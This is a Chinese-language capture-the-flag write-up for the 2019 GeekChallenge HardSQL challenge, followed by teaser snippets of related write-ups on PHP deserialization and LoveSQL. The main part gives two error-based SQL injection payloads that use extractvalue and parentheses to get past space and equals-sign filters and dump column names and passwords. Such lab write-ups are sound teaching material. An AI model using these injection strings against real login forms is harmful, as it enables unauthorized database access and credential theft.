極客大挑戰 2019 HardSQL wp

2021-10-07 18:44:03 字數 1359 閱讀 5134

有過濾,抓個包fuzz一下

等號,空格等被過濾

發現可以用報錯注入,空格可以用括號代替

查表名

username=admin'or(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('h4rdsq1')))))%23

發現只出一半,substr被禁用了

這裡可以用right()

username=admin'or(extractvalue(1,concat(0x7e,(select(group_concat(right(password,20)))from(h4rdsq1)))))%23

極客大挑戰 2019 PHP

開啟以後,是三個php原始碼,其中最重要的是class.php,如下 include flag.php error reporting 0 class name function wakeup function destruct if this username admin else 看了一下,這個...

極客大挑戰 2019 PHP

剛進入 我們可以看到這樣的乙個介面 根據內容提示,有備份 的習慣 日常後台掃瞄,發現有www.zip檔案,我們進行解壓得到 看到flag.php開啟檢視,發現沒有什麼有用的資訊。我們開啟index.php看看 我們可以看到通過get方式傳入引數select,並對引數select進行反序列化。接下來,...

極客大挑戰 2019 LoveSQL wp

開啟頁面是這樣的,我們先試試萬能密碼 顯示登陸成功,通過上面的url可以判斷有sql注入且為get方式下面我們來進行注入。首先我們來查列數,注入 發現不存在,說明有1,2,3列,繼續我們來找注入點,注入語句 找到注入點是2,3 我們先試試3,借助我們爆資料庫,注入語句 爆出資料庫 informati...